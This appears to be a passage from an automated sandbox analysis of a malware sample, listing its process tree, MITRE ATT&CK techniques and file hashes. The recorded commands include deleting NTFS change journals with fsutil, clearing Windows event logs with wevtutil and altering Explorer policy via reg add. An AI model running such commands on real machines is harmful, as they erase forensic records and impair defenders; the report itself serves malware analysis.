C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:7212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:13892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:13336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12688
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3620
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:3516
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:8200
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:14400
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:5824
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:6044
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5972
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:13716
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bfe548ef1d9bccf0ae4876f684d35190
SHA1767083b41840de7611f606e49a0033eb4878adef
SHA256ae0dd6af74cafe2bf0803c08e57e032602098ec3e1f0ad791b77bbfdff07ab2d
SHA5122348a25766866d70cf830ee9650b7fbd1c147fd99e6c2e903dd915d97acb03da56ef2e92f2a990eff2f1d80e8f313c9061ec71cdadb98717aa31df2fd91cb387
-
Filesize
684B
MD5156d86b65903df0ac9dd70f1fb76769e
SHA1b844e28aaf0e62b7162c1c332fae7597f21fb058
SHA256642e54a9184ed09dd530cc14e6b123317d9af91b1fe184b5225ad292ed6f7f83
SHA512915121a1fd750a77b8efbaa53210752f0e4dc244f96dadc7e5539c1c590b6c98669e30426b664dea0ebd116e18b5062603330a61bd213bc28e685114f52e8424
-
Filesize
12KB
MD587a92858e69a0928b7da47b65fecd68f
SHA153a2fe164fdc4066382c0c47f4b20619eb1a604f
SHA256a26e00458d5e33608803cc85e728d9e06524969a4f1d39546498eac3d1bad01e
SHA51296807c12b195ce7581ba12bb1bb14aab634c01178d4684b4ad0acf6b2c6052e0b865177789ccaf297613f3db5682356dc1514452b04cea9ca07d0035cffdaba0